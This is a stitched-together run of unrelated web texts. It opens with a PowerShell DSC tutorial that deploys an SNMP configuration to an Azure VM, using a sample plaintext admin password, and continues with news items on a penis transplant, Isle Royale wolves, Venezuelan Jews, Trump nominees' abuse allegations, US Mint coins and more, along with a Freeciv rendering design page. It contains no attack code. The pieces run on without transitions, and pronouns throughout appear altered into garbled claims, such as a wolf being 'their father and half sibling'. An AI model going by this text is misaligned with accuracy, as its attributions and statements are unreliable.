# Création configuration pour une configuration SNMP Configuration Test { Import-DscResource -ModuleName cSNMP Node localhost { WindowsFeature SNMPService { Name = 'SNMP-Service ' Ensure = 'Present ' } WindowsFeature SNMPRSAT { Name = 'RSAT-SNMP ' Ensure = 'Present ' } cSNMPCommunity Community { Community = `` Test '' Right = `` ReadOnly '' Ensure = `` Present '' DependsOn = ' [ WindowsFeature ] SNMPRSAT ' } } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 # Création configuration pour une configuration SNMP Configuration Test { Import-DscResource -ModuleName cSNMP Node localhost { WindowsFeature SNMPService { Name = 'SNMP-Service ' Ensure = 'Present ' } WindowsFeature SNMPRSAT { Name = 'RSAT-SNMP ' Ensure = 'Present ' } cSNMPCommunity Community { Community = `` Test '' Right = `` ReadOnly '' Ensure = `` Present '' DependsOn = ' [ WindowsFeature ] SNMPRSAT ' } } }
Ok , so as i said before we used here a custom resource in our DSC configuration script . Now it 's time to publish it to our created container .
Publish-AzureVMDscConfiguration -ConfigurationPath G : \Scripts\DSC_SNMP.ps1 -StorageContext $ Context -ContainerName demopwrshelldotnet 1 2 3 Publish-AzureVMDscConfiguration -ConfigurationPath G : \ Scripts \ DSC_SNMP . ps1 -StorageContext $ Context -ContainerName demopwrshelldotnet
Nothing really difficult here , want to take a look at what we have uploaded ?
Get-AzureStorageBlob -Context $ Context -Container demopwrshelldotnet 1 2 3 Get-AzureStorageBlob -Context $ Context -Container demopwrshelldotnet
Let 's take a look about what is stored in this zipped file ! We ca n't take a look like that on the blob , but we could archive the published file .
Publish-AzureVMDscConfiguration -ConfigurationPath G : \Scripts\DSC_SNMP.ps1 -ConfigurationArchivePath ' G : \Scripts\DSC_SNMP.ps1.zip ' 1 2 3 Publish-AzureVMDscConfiguration -ConfigurationPath G : \ Scripts \ DSC_SNMP . ps1 -ConfigurationArchivePath ' G : \Scripts\DSC_SNMP.ps1.zip '
Our needed custom resource is here , as well as our ps1 file !
Apply a DSC extension
When you create an Azure virtual machine , here how you can apply a DSC Configuration .
$ VM = New-AzureVMConfig -Name `` Tetest035 '' -InstanceSize Small -ImageName `` a699494373c04fc0bc8f2bb1389d6106__Windows-Server-2012-R2-201412.01-en.us-127GB.vhd '' $ VM = Add-AzureProvisioningConfig -VM $ VM -Windows -AdminUsername `` Administrateur '' -Password `` P4ssw0rd ! '' $ VM = Set-AzureVMDSCExtension -VM $ VM -StorageContext $ Context -ContainerName demopwrshelldotnet -ConfigurationArchive `` DSC_SNMP.ps1.zip '' -ConfigurationName `` Test '' New-AzureVM -VM $ VM -ServiceName Service -WaitForBoot -AffinityGroup Affinity 1 2 3 4 5 6 7 $ VM = New-AzureVMConfig -Name `` Tetest035 '' -InstanceSize Small -ImageName `` a699494373c04fc0bc8f2bb1389d6106__Windows-Server-2012-R2-201412.01-en.us-127GB.vhd '' $ VM = Add-AzureProvisioningConfig -VM $ VM -Windows -AdminUsername `` Administrateur '' -Password `` P4ssw0rd ! '' $ VM = Set -AzureVMDSCExtension -VM $ VM -StorageContext $ Context -ContainerName demopwrshelldotnet -ConfigurationArchive `` DSC_SNMP.ps1.zip '' -ConfigurationName `` Test '' New-AzureVM -VM $ VM -ServiceName Service -WaitForBoot -AffinityGroup Affinity
Note the Set-AzureVMDSCExtension cmdlet used to apply the Test configuration in our script .
The VM is now deployed with SNMP configured like show in the screenshot bellow !
Ok this is all for today . In the last article of this series , we 'll see how deploying our Active Directory and other Lab 's VM . We 'll also see how we can use Pester to validate everything so easily !
So , stay tuned and feel free to comment !
The video will start in 8 Cancels
Get the biggest daily news stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
A black man who received a penis transplant is to have it tattooed in a world first - because the donor was white .
The 40-year-old lost their organ after a botched traditional circumcision and underwent the transplant as the third person ever to undergo the procedure .
But in the next six months , they will be able to have sex and urinate standing up for the first time in seventeen years .
The South African team who carried out the surgery revealed there was just one issue to resolve - which they delicately described as `` a colour discrepancy . ''
( Image : Stellenbosch Uni/SWNS.COM )
Professor Andre van der Merwe said : `` The patient is black , and the donor was white .
`` We have very few donors for this transplant procedure . But that is the only issue left .
`` He is certainly one of the happiest patients we have seen in our ward .
`` He is doing remarkably well .
( Image : Stellenbosch Uni/SWNS.COM )
`` There are no signs of rejection and all the reconnected structures seem to be healing well .
`` The patient is expected to regain all urinary and reproductive functions of the organ within six months of the transplant .
`` A colour discrepancy between the recipient and the donor organ will be corrected with medical tattooing between six to eight months after the operation . ''
The professor added : `` The penis is working well , they can get erections already .
( Image : Stellenbosch Uni/SWNS.COM )
`` The man had been in relationships before , but whenever the question of sex arose , they bailed out . That will no longer be a problem .
`` He had been suffering with depression beforehand , and was even suicidal .
`` We hope the rest of the world will catch on to the need for the operation . ''
Team member Dr Alexander Zuhlke explained the tattooing can be applied in the case of penis transplants - just like it is for nipples after a mastectomy , for instance .
But it should be performed by a tattooist specialising in medical tattooing and will require multiple visits .
( Image : INTERNET UNKNOWN )
However , until now there was no experience with such a procedure , since it had not been needed in the other two transplant cases .
Prof Van der Merwe , a urologist at Stellenbosch University , Western Cape , said the patient was now `` doing extremely well , both physically and mentally . ''
`` He is living a normal life . Their urinary and sexual functions have returned to normal , and they have virtually forgotten they had a transplant . ''
But the biggest challenge remained organ donation and Prof Van der Merwe said : `` I think the lack of penis transplants across the world since we performed the first one in 2014 , is mostly due to a lack of donors .
`` It might be easier to donate organs that you can not see , like a kidney , than something like a hand or a penis . ''
In South Africa , penis mutilation is more common than other parts of the world because of complications in ritual ceremonies .
In certain rural cultures in the country , there are several cases of botched circumcisions .
It was the reason for Prof Merwe 's original groundbreaking operation two-and-a-half years ago and the latest transplant operation took nine-and-a-half hours .
One study reported up to 55 cases of penis mutilations in the Eastern Cape alone .
( Image : Stellenbosch Uni/SWNS.COM )
Experts estimate that as many as 250 partial and total amputations take place across South Africa every year , with suicides also being reported .
Prof Van der Meuwe said the latest operation was trickier than the first , because the man had smaller blood vessels .
They added : `` We are very thankful it went so well . There were a lot of things that could have gone wrong . ''
The procedure was part of a proof of concept study to develop a cost-effective penis transplant procedure that could be performed in a typical theatre setting in a South African public sector hospital .
By applying lessons learnt from the first transplant , the team significantly cut the costs of the second .
Only one other similar operation has been carried out before , at Massachusetts General Hospital last year .
Dr Nomafrench Mbombo , Western Cape health minister , said : `` Traditional circumcision has claimed many young lives in South Africa .
`` For this patient , life will never be the same again . ''
The entire penis was carefully dissected from the donor to keep blood vessels , nerves and other connecting structures intact .
These were marked and connected to the recipient 's correlating tissue during the transplant .
The surgeons connected three vessels to ensure sufficient blood flow to the transplanted organ , and two nerves to restore sensation which enables the recipient to urinate through the penis and obtain an erection .
The study was published in the Journal of Materials Science .
Drawing lots of textures with OpenGL can be slow , especially if we do it in several passes , or by rebinding textures a lot . That is why we need to pack textures into texture pages , and use several texture units with multitexturing to draw several textures at once . This presents some problems , as Freeciv uses plenty of layers of information , and graphics card today do not have very many texture units . Basically , the number of passes we need to do ( redrawing everything ) is texture pages / texture units . So the fewer texture pages we need , the better . We can assume that everyone today have 4 texture units on their graphics cards . But Freeciv has many more layers , and we want to finish drawing the terrain with one pass . We do this by rendering many of the possible combinations beforehand and storing them in the texture pages . However , texture pages are not infinitely large , either , we can assume a maximum of 2048x2048 for modern cards , less for older ones , so we need to keep the number of combinations down .
We have lots of basic tiles , which we 'll call pies , because they taste so good and get cut up into neat triangular slices . The slices again are composed of layers of good tasting textures , where each layer corresponds to one texture page that is applied on the slice .
For terrain , the first texture page will contain basic terrain slices . No combinations are created here , making terrain types easily modifiable .
The second texture page contains irrigation , farmland and rivers . Since you can not have irrigation and farmland at the same time , and we have five basic river directions ( including origin ) , the number of combinations here is 3 * 5 + 2 = 17 .
The third texture page contains road , rail and fortress wall . Since you can not have road and rail at the same time , and we have 6 basic directions for road and rail ( no origin , but each direction has to have the option of going in toward pie center for cities ) , the number of combinations here is 6 * 2 * 2 = 24 .
Cities are done in a separate , second pass , added on pies as rectangular textures . The hut , airbase , fallout and pollution specials can not be combined with cities , and would very much like to occupy the larger center of the pie , and are therefore added in this pass . Mines are added in this pass , too , because although you can build both mine and city on the same tile in Freeciv , you only ever see the city ( this combination should be considered a misfeature , but that is another matter ) .
Units and their attributes are done in a third , separate pass , also as rectangular textures .
Contents show ]
Terminology Edit
Pie : The basic tile unit , which is either a hexagon or a pentagon .
Slice : A triangular piece of a pie . A pie is composed of 5 ( pentagon ) or 6 ( hexagon ) slices .
Layer : A triangular texture that is applied on top of a slice . Often a slice can have 3 layers .
Texture unit : Each texture unit on a graphics card can draw one texture simultaneously .
Texture page : A texture uploaded through OpenGL to the graphics card containing many separate , tightly packed slices .
Multitexturing : See this presentation
Source Code Edit
Source Code is available for testing from GNA SVN : http : //svn.gna.org/viewcvs/buckyball/trunk/
SDL in MINGW : http : //www.netadelica.com/coding/sdl/install.html Crosscompiling for Windoze : http : //wiki.njh.eu/MinGW-Cross-Compiling_mit_SDL ( in German , sorry folks )
Design Edit
The program currently features three major components ( for definitions of the various terms see above ) :
fgl -- OpenGL core . Error reporting , the main loop , window mgmt , PNG loader , texture manager backend .
triren -- Triangle renderer . This component is supposed to render the terrain of the earth when it 's done . It basically puts triangles to the screen , doing the appropriate optimizations so this happens fast . Vertex buffers are implemented , VBOs may come in the future . A hacky texture manager is there . Visibility management is now out of scope for the rendering engine and will be handled at a higher level . Support for disabling subsets of the triangles is there .
camera -- Camera management code has been split out in a separate module . It does proper animations of the world when clicking and dragging it ; fov-based zoom is there ; seems to be quite stable . Code for the plane maps is missing , and we 'll probably need some frustum/sphere or frustum/box intersection code . Subtile picking code is lacking .
test_util -- A tiny wrapper around everything which provides a basic user interface for development work .
world -- Currently a vague mix of testing code and the world generators . When it 's done , it is supposed to do the following be able to provide the world mesh ( i.e . coordinates of the tiles ) , for at least two topologies : sphere ( buckyball/hexball ) and plane ( hexplane ) [ For generating beautifully easy spheres made of hexagons and pentagons , I suggest starting with an icosahedron and then subdividing using Leif Kobbelt 's root3 subdivision sheme , http : //citeseer.ist.psu.edu/viewdoc/download ; jsessionid=CB23D9C583913A53C423033608576A7F ? doi=10.1.1.43.1955 & rep=rep1 & type=pdf ] be able to generate a map ( i.e . playable continents and such ) on that mesh , possibly using a PNG file as input provide abstractions to both the Freeciv backend code ( as in game rules , AI , network , ... ) and triren . To Freeciv , it should present a set of tiles called /pies/ and connections ( possible moves ) among those . To triren , it presents a list of triangles called /slices/ , complete with numerical values for vertices , normal vectors and texture numbers for each layer , so that triren has all the information required to render them properly . A huge part of `` world '' will be glue code translating between those components . It needs to break down the game /pies/ down into 5 or 6 /slices/ . Then it will have to choose textures which represent the game content on the screen , and tile properly .
Texturing Edit
The creation of textures faces one serious problem : The map consists of hexagons and pentagons . Probably the only way to simplify this is to create textures for slices instead of for pies , which can then be combined to form either hexagonal or pentagonal pies .
The slice textures should be oriented along a few fixed points : the center point of the pie , which is a corner of the slice , the other two corners of the slice , and the middle points of the slice 's sides .
Perhaps the different layers can follow different rules :
the lowest layer , used to create the terrain , could perhaps consist of overlapping circular textures . each circular texture is centered on a pie center and extends to the pie corners , slightly overlapping the neighboring pies along the edges of the pie . the part that extends into the neighboring pie fades outward , creating soft edges .
the second layer , consisting of terrain modifiers ( farmland , irrigation ) could also consist of circular textures spanning 2/3 of the pie diameter
the third layer , consisting of road , rail , fortress wall and rivers could then be slice-based . as long as the angle at which road ( and rail ) touch slice borders is 90 degrees , there is no distortion or sudden angulation
rivers flow between pies , curving into this or that tile , based on the direction they come from and flow to . coding this should be relatively easy .
the last layer is for cities and mines , added as rectangular textures
Texturing - State of the renderer Edit
The rendering engine currently can do two layers of triangular textures which are loaded from PNG files ( v9textures ) . ( See shiny new screenshot . ) Upgrade to 4 layers poses no further problems , however the v9textures file format is far from optimal . The edges of our triangles remain untextured because of missing overlap space . ( In short , the textures are too small . ) During the planning of texturing this should be considered , and solid hexagonal/pentagonal/round textures should be used in the future .
Concept / Idea Art Edit
Related Pages Edit
Sphere discusses several general ideas for creating spherical gameplay in Freeciv
Two wolves survive in world 's longest running predator-prey study
For 2 years in a row , a pair of wolves has managed to survive on Isle Royale , Michigan , the last of their kind on the wilderness island . Researchers continue to track the wolves and their moose prey , in the last installments of the world 's longest running predator-prey study . They report today that although the wolves hunt successfully , they are too few to affect the moose population . Aquatic as well as terrestrial vegetation is taking a hit as moose numbers climb , according to the study 's 59th annual report .
After Canadian wolves colonized the island in 1949 , the wolf population peaked at 50 in 1980 , and as recently as a decade ago , 30 wolves prowled the island , a U.S. National Park . The island 's now-famous predator-prey study has tracked how wolf and moose numbers have risen and fallen in tandem over the decades , and left their mark on the island 's ecology .
In contrast to last year 's winter study , when wolf tracks were the only evidence of the predators , wildlife ecologist Rolf Peterson spotted both wolves sitting on lake ice on the January afternoon they arrived on the island . Weeks later , Peterson and co-investigator John Vucetich , both of Michigan Technological University in Houghton , found the wolves feeding on a freshly-killed moose calf . “ We were very lucky , ” Peterson says . “ There was no mystery left in terms of the wolf population , ” or what they were eating .
The researchers also observed that , in what normally would have been the wolves ' breeding period , the 7-year-old female bared their teeth in response to the close interest of the 9-year-old male ; they are both their father and half sibling . Researchers do n't expect the highly inbred pair to reproduce .
The two wolves otherwise appeared healthy and still have all their canines , a key sign of well-being in the carnivores . The pair has already surpassed the average Isle Royale wolf lifespan of 4 years , dodging the main causes of death for their ancestors on the island : other wolves and starvation . “ They are swimming in moose , ” Vucetich says .
The four wolf-killed carcasses the researchers spotted made little dent in the overall moose population , estimated at 1600 in aerial surveys conducted this past winter . The 20 % increase from last winter is consistent with the population 's growth rate over the past 6 years , as the inbred wolf population dwindled and collapsed . Both beaver and moose abundance have tripled since 2011 , “ undoubtedly because of lack of predation , ” Vucetich says .
With moose density on the Guam-sized island already five to ten times higher than on the mainland -- and with the numbers on track to double in three to four years—browsing on the island 's vegetation is intense . One aquatic plant , floating watershield ( Brassenia schreberi ) , which was abundant six years ago when moose were at historic lows , now thrives in ponds only where moose are excluded . “ It 's the aquatic equivalent of deforestation , ” says plant ecologist Eric Hellquist of SUNY Oswego , noting that moose 's effect on aquatic vegetation is not as well studied as that on terrestrial plants . Isle Royale 's ponds are demonstrating “ how apex predators can have cascading effects on food webs . ”
As the effects of the missing predators ripple through the island , the Park Service is assessing about 5000 public comments on its proposal to introduce 20 to 30 wolves to the island to establish a new population . The next steps on that plan are expected by the end of this year .
Children need educated on how to view porn , says Ulster Teachers ' Union BelfastTelegraph.co.uk The Ulster Teachers ' Union has called for children to be educated on pornography , to help divert them from addiction . https : //www.belfasttelegraph.co.uk/news/northern-ireland/children-need-educated-on-how-to-view-porn-says-ulster-teachers-union-35048638.html https : //www.belfasttelegraph.co.uk/news/northern-ireland/article35030859.ece/16c49/AUTOCROP/h342/2016-03-12_new_17608528_I1.JPG
Email
The Ulster Teachers ' Union has called for children to be educated on pornography , to help divert them from addiction .
Jacquie Reid , deputy general secretary of the Ulster Teachers ' Union , made the call after a Scottish college introduced pornography awareness classes .
They said : “ It is naïve to believe that children wo n't either deliberately or accidentally access pornographic images and videos via the internet – and sometimes these can be in the extreme end of the scale .
“ As this is n't a topic often discussed at home – though that is arguably where it should be raised – there could be an opportunity for education in school .
“ Just last year the NSPCC revealed that one in 10 children feared they were addicted to porn so it is vital this area is addressed .
“ With access to this material so widely available our children must be educated in how to view it – they must be media-savvy when it comes to pornographic material in the same way we educate them to be media-savvy when it comes to advertising , for instance .
`` The more open and honest dialogue we can have with young people about sex – and that has to include porn given its ease of access - the better . ''
The union said introductory lessons needed to take place in primary schools to begin with but tailored to each specific age group . For example 10/11 year olds would be taught about body image with the explanation that celebrities in magazines would be airbrushed and their images not reflect reality .
`` They need to be taught about what reality is because children could use those unrealistic images of celebrities as basis for forming relationships , '' they said .
The teacher described some schools in Northern Ireland as `` excellent '' in their sex education of pupils while others were restricted by their ethos . Although they would not go into details on which schools .
They added : `` No matter the ethos of the school , children will be exposed to pornography and they need the support in place to deal with that . ''
Jacquie continued : “ Children need to be taught , as form of media literacy , ‘ how ' to view these images -images that can create unrealistic body expectations and often convey nothing about real relationships . They need to know how to read these images in context and judge them accordingly .
“ They are surrounded by sexualised images every day – on TV , in magazines , on billboards - and they need the tools to understand what is real as opposed to acting .
“ This is not an easy thing to talk about – it will stir controversy and possibly backlash from some parents who themselves are uneasy with this whole area . But the facts speak for themselves ; if children are going to be exposed to porn they need to have the understanding judging it in context .
“ Neither parents nor teachers can police children 24-7 in this age of mobile technology but at least if children have the knowledge they can make the right choices .
“ However , once again , it is imperative that if teachers are to tackle these issues they receive the best possible training and support themselves in order to ensure they tackle these subjects from a position of security and confidence . ”
Belfast Telegraph Digital
JTA — They left after Venezuelan secret police raided a Jewish club in 2007 , and after the local synagogue was ransacked by unidentified thugs two years later .
They left after President Hugo Chavez expelled Israel 's ambassador to Caracas , and when they called on Venezuela 's Jews to condemn Israel for its actions in Gaza in 2009 .
They left when Caracas claimed the ignoble title of most dangerous city in the world — and when inflation hit double digits , food shortages took hold and the country 's murder rate reached 79 per 100,000 people .
Get The Times of Israel 's Daily Edition by email and never miss our top stories Free Sign Up
With Venezuela now roiled by anti-government demonstrations — the death toll reached 18 last Saturday — Venezuelan Jews who remain have yet another reason to leave their country : growing despair .
“ There 's less hope about the future , ” said Andres Beker , a Venezuelan Jewish expatriate in the United States whose parents still live in Caracas . “ My parents are huge fans of Venezuela . Until last year I thought they would stay no matter what . Now , for the first time , they 're talking about Plan B : leaving Venezuela . ”
Over the last 15 years , from the time Chavez came to power and in the year since Nicolas Maduro has ruled the country , the Venezuelan Jewish community has shrunk by more than half . It is now estimated at about 7,000 , down from a high of 25,000 in the 1990s . Many of those who left were community leaders .
‘ There 's less hope about the future '
It 's not just Venezuelan Jews who are leaving . Hundreds of thousands of middle- and upper-class Venezuelans have relocated in recent years , swelling the size of expat communities in places like Miami , Panama , Costa Rica , the Dominican Republic and Colombia .
The exodus of Venezuelan Jews has put a great strain on the community 's institutions .
“ Emigration has really played a big factor in the community — that 's our main problem , ” said Sammy Eppel , a Caracas journalist and Jewish community member who also serves as director of the B'nai Brith Human Rights Commission in Venezuela .
“ When we were a numerous and prosperous community , we built numerous and heavy institutions , ” Eppel said . “ A lot of our members have left , and we are left with the same institutions but with fewer people to take care of them . We have to make serious adjustments while making sure the services we provide to the community do n't suffer . ”
A high school junior named Allan who attends the Jewish community school , Hebraica , says their grade has shrunk to 85 students from 120 six years ago . The younger grades are much smaller , with 40-50 kids each . The school is now considering combining the first and second grades , they said .
Interested in keeping as low a profile as possible , leaders of Jewish institutions in Venezuela declined to be interviewed by JTA for this story .
The massive anti-government demonstrations that began on Feb. 12 were sparked in part by new lows for Venezuela 's economy and an upsurge in violence .
‘ It started deteriorating to the point where a couple months ago you could n't get milk , chicken , eggs , toilet paper '
“ It started deteriorating to the point where a couple months ago you could n't get milk , chicken , eggs , toilet paper , ” Beker said . “ It 's really started to affect all families . ”
Allan , the high schooler , said the streets long have been off limits for them and their friends , due to threats of violence and kidnapping . But these days , it 's hard to leave the house to go anywhere .
“ Now it 's more dangerous , ” Allan said . “ Nobody goes out , nobody goes to parties , nobody goes to dinner . Everybody 's in their houses . ”
Outsiders might puzzle over why anybody would stay given the challenging circumstances of daily life . But Venezuelan Jews say leaving home is never easy . There are those with jobs that ca n't be shifted overseas , and those who lack the money or energy to leave and start over somewhere else . And the changes have been gradual enough that , time and time again , Venezuelan Jews — like their gentile countrymen — simply have adjusted to the new reality .
“ It 's a matter of adjusting , I think , not a matter of survival , ” Eppel said . “ That 's what the community has been trying to do : adjust to adverse circumstances . ”
Sandra Iglicki , who left Venezuela for South Florida a decade ago but still goes back often , says it 's also been emotionally difficult to leave a country that for decades was good to Jews , serving as an anti-Semitism-free refuge for European Jewish families who fled the Nazis .
“ It 's very painful for the community in Venezuela , ” they said .
And there 's still some hope , even among expats , that the country eventually will right itself .
‘ If you talk to a lot of Venezuelans that are here , they 're waiting for this to be over '
“ If you talk to a lot of Venezuelans that are here , they 're waiting for this to be over , ” Iglicki said in a phone interview from Florida . “ I would love to go back to Venezuela . ”
Many emigrants still work in Venezuela , commuting back for weekdays to run their businesses while their families adjust to life in a new country .
In Miami , the last few weeks have been particularly fraught for Venezuelan expats , filled with anxious phone calls to relatives back home and endless agitation on social media .
With state media in Venezuela blacking out news of the massive demonstrations , the expats have occupied the peculiar position of funneling news to relatives back home in Caracas about what 's happening in Venezuela , often via Facebook , Instagram and Twitter . Offline , there have been large demonstrations in Miami against the Maduro government , which is blamed for Venezuela 's tailspin .
“ This is something that in Miami is top news every day , ” said Juan Dircie , associate director of American Jewish Committee 's Latino and Latin American Institute in Miami . “ The exile community of Venezuelans has been holding rallies , doing interviews on TV , writing letters to the editor . The demonstrations are in favor of democracy and human rights , but of course there is a big component of opposition to the Maduro government . ”
Beker , who left Venezuela eight years ago at age 17 to go to Emory University , said they recently did a quick tally to calculate whether they had more family members in Miami or Caracas . They said they were shocked when they realized Florida won out .
“ It 's a little sad , ” Beker said . “ You think : I 'm just going to college for a couple of years and coming back . But that never happens . ”
Former Secretary of State and Democratic presidential nominee Hillary Clinton will speak at a fundraiser in Baltimore next month for a program that pays for students to travel to Israel -- marking the Democrat 's first public appearance in the state since last year 's primary election .
Clinton will speak at an event for the Elijah Cummings Youth Program , a 19-year-old collaboration between the Democratic member of congress and the Baltimore Jewish Council that pays for a dozen high school juniors in Cummings ' congressional district to learn about and study in the country every year .
Clinton last spoke in Baltimore on April 10 , 2016 , days before Maryland 's Democratic presidential primary . They beat Vermont Sen. Bernie Sanders by a nearly two-to-one margin in that election , and performed similarly well against President Donald Trump in the state in November .
Cummings and the Jewish Council created the program in 1998 . The member of congress not only meets with students who participate but also donates honorarium they receive for speeches to the group . The students involved , most of whom are African American , learn about Israel during their junior year and then travel to the country for three-and-a-half weeks the following summer .
`` One of the major goals is to build a strong relationship between the African American and Jewish communities , '' said Howard Libit , the executive director of the Baltimore Jewish Council .
The fundraiser will take place on June 5 at the Frederick Douglass-Isaac Myers Maritime Park in Fells Point . Tickets start at $ 125 .
Clinton has kept a relatively low profile since losing the election last year , though they emerged this month at an event in New York and said they would be “ part of the resistance ” to Trump and blamed their surprise loss in part on Russian interference and former FBI director James B. Comey .
john.fritze @ baltsun.com
twitter.com/jfritze
This article originally appeared on PEOPLE.com
Wedding bells are ringing for Serena Williams !
The tennis great has announced that they are engaged to Reddit co-founder Alexis Ohanian , 33 . Fittingly , they broke the news on Reddit in the form of a poem .
“ I came home . A little late . Someone had a bag packed for me . And a carriage waited . Destination : Rome , ” Williams , 35 , wrote on their verified Reddit account .
“ To escort me to my very own ‘ charming . ' Back to where our stars first collided . And now it was full circle . At the same table we first met by chance . ”
They continued : “ But by choice . Down on knee . They said 4 words . And I said yes . ”
The engagement comes as a surprise to many – Williams and Ohanian have kept their love off of social media .
TIMOTHY A. CLARY/AFP/Getty Images
President-elect Donald Trump has said that “ nobody has more respect for women ” than they do . Yet , their choices to fill the top slots in their administration tell an entirely different story . On Thursday , they announced that fast-food CEO Andrew Puzder was their pick for labor secretary . The same day , serious allegations that Puzder abused their ex-wife emerged ― putting them in the same company as Trump 's choice for White House chief strategist , Steve Bannon , and even the president-elect himself . Andrew Puzder
Fred Prouser/Reuters Andrew Puzder 's ex-wife accused them of attacking them in 1986 . They recently withdrew the allegations .
The abuse claims against Puzder were first published as a cover story for the Riverfront Times in 1989 . You can read the full story here , which the Missouri-based weekly newspaper republished on Thursday . According to court documents obtained by the paper , Puzder 's first wife , Lisa Henning , alleged that they hit them and threw them to the kitchen floor during an altercation in 1986 . Henning filed for a protective order , saying Puzder “ attacked me , choked me , threw me to the floor , hit me in the head pushed their knee into my chest twisted my ar​m and dr​agged me​ ​on the floor , threw me against a wall , tried to stop my call to 911 and kicked me in the back. ” It 's worth noting that “ choking ” ― which experts in domestic violence say is more accurately called strangulation ― is a serious risk factor for future lethal violence , and is treated as a felony offense in many states . Puzder denied the allegations , calling them baseless . “ This is what normally happens in divorce [ cases ] , ” they told Riverfront Times at the time . “ You 're blowing it way out of proportion. ” However , they offered to resign from their post as chair of the then-Missouri Gov . John Ashcroft 's Task Force for Mothers and Unborn Children because of the story , the paper reported . Henning recently walked back their abuse claims in an email to their ex-husband . A few hours after the Riverfront Times reprinted its decades-old reporting on the allegations , a spokesperson for Puzder supplied a copy of the email , dated Nov. 30 , 2016 , to the paper . “ I impulsively filed for a divorce without your knowledge and was counseled then to file an allegation of abuse . I regretted and still regret that decision and I withdrew those allegations over thirty years ago . You were not abusive , ” the email reads , in part . “ I wish you always the best of luck in any and all of your endeavors . I know you would be an excellent addition to the Trump team. ” Experts in domestic violence note that it is common for victims to recant allegations of domestic abuse for a host of reasons , including fear of retribution and needing financial support from the abuser . The women who accused Puzder , Bannon and Trump of domestic violence have since either retracted the allegations or refrained from testifying . Henning 's lawyer , Daniel Sokol , told the newspaper in 1989 that they had copies of medical reports to substantiate that Henning suffered an injury . “ I thought their story was not only credible but true , ” they told the paper . “ I would not pursue a cause of action on behalf of a client unless I believed it. ” Steve Bannon
Mark Kauzlarich/Reuters Steve Bannon was charged with misdemeanor domestic violence , battery and dissuading a witness from reporting a crime , but the charges were dropped when their ex-wife did not appear in court .
The allegations against Puzder are similar to those against Bannon , the head of Breitbart News whom Trump named as their chief strategist and senior counselor in November . Police responded to a hang-up 911 call at Bannon 's home on New Year 's Day , 1996 , according to a Santa Monica police report obtained by Politico . They were met at the door by Bannon 's then-wife , Mary Louise Piccard , who claimed that they and Bannon got into a fight after they asked them for money for groceries . The couple had twin infants . They told police that Bannon grabbed them by the wrist and the neck during a physical altercation . They got away from them and attempted to call 911 , but Bannon wrestled the phone away from them and tossed it across the room , they said . An officer who responded to the scene noticed red marks on Piccard 's left wrist and the right side of their neck , which were photographed . A domestic violence protective order was issued against Bannon , who was charged with misdemeanor domestic violence , battery and dissuading a witness from reporting a crime . They pleaded not guilty , but the case was ultimately dismissed when Piccard failed to show up in court . According to court records obtained by The New York Times , Piccard claimed that Bannon ordered them to leave town to avoid testifying . Bannon told them that “ if I went to court they and their attorney would make sure that I would be the one who was guilty , ” they said . Donald Trump
Shannon Stapleton/Reuters Donald Trump 's first wife , Ivana , once claimed that Trump had raped them They later said the story was `` without merit . ''
Video
Woolwich murder suspect Michael Adebolajo was being `` harassed '' by MI5 and had been asked to work for the agency , a childhood friend has told Newsnight .
Abu Nusaybah spoke to the BBC 's Richard Watson about their friendship with Adebolajo , who is linked with the killing of 25-year-old Drummer Lee Rigby .
Mr Nusaybah said Adebolajo told them that MI5 agents visited their house around six months ago .
`` He mentioned that initially they wanted to ask them if they knew certain individuals . After them saying they did n't know these individuals ... they asked them whether he 'd be interested in working for them , '' they told the BBC .
The BBC could not obtain any confirmation from Whitehall sources .
Mr Nusaybah was arrested on BBC premises by Met Police Counter-Terrorism Branch , after the interview , on suspicion of terrorism offences .
Production of 2016 American Eagle silver bullion coins and American Buffalo gold bullion coins has ended at the West Point Mint so production of 2017 coins can begin . Images courtesy of U.S. Mint .
The United States Mint will begin accepting orders Jan. 9 from the bureau 's authorized purchasers for 2017 American Eagle gold and silver bullion coins and American Buffalo gold bullion coins . The Mint expects to begin accepting orders for 2017 American Eagle 1-ounce platinum bullion coins sometime in late January .
U.S. Mint officials announced Nov. 30 that production had ended at the West Point Mint for American Eagle 1-ounce silver bullion coins and American Buffalo 1-ounce gold bullion coins . Remaining 2016 inventories will be sold until depleted . U.S. Mint officials did not disclose how many 2016 bullion coins remain in inventory .
The West Point Mint is completing production of all four sizes — 1-ounce , half-ounce , quarter-ounce , and tenth-ounce — of 2016 American Eagle gold bullion coins . Upon completion of production of these coins , remaining 2016 inventories will be sold until depleted . The number of coins remaining for each size has not been disclosed .
Connect with Coin World :
Sign up for our free eNewsletter
Like us on Facebook
Follow us on Twitter
The 2017 coins will be offered Jan. 9 on an unallocated basis .
Details concerning sales of the American Eagle platinum bullion coins will be provided at a later date . U.S. Mint officials have not disclosed whether the platinum coins will be offered without mintage restrictions or in limited numbers like they were in 2016 . Only 20,000 American Eagle platinum bullion coins were offered in 2016 , and all were sold .
None of the bullion coins are offered directly to the public . Instead , they are sold through a series of approved , authorized purchasers who buy the coins based on the London PM closing spot for each precious metal on a given day plus a small premium per coin .
The coins may then be resold at a markup to other dealers , collectors and investors .
WHDH and NBC are planning their next moves in their ugly television ? divorce now that a federal judge has knocked the legs out from under Channel 7 's legal challenge to the network 's move to strip it of all NBC programming on Jan. 1 .
“ The matter is under ? review , ” WHDH spokesperson Joan McCready told the Track . “ We have no comment at this time . ”
Meanwhile , NBC must move quickly in order to get a network-owned station , dubbed NBC Boston , up and running in just over six months .
As you may know , U.S. Judge Richard Stearns on Monday threw out Channel 7 's bid to hang onto its NBC affiliation , saying the station fell victim to “ doing business in a competitive and unsentimental marketplace. ” The decision appears to clear the way for NBC to launch a network-owned station in Boston on Jan. 1 and to move all the NBC programming — “ The Voice , ” “ The Tonight Show Starring Jimmy Fallon , ” “ Sunday Night Football , ” etc . — from Channel 7 to the new signal .
The judge ruled that 'HDH had no standing to claim that the new station would fail in its duties to provide free over-the-air television to the Boston area because it will broadcast on WNEU 's signal , which is weaker than WHDH 's .
“ He seemed to leave it up to the viewers to make that complaint , ” said one local TV insider . “ But there are n't a lot of rabbit ears out there . Most people have cable . ”
NBC has not confirmed that it will broadcast over WNEU , a station that it owns and which currently carries Telemundo programming . A network source said that issue “ has n't been resolved yet . ”
“ I think NBC will wind up with a stronger signal , ” said our spy . “ Especially with the spectrum auction coming up . ”
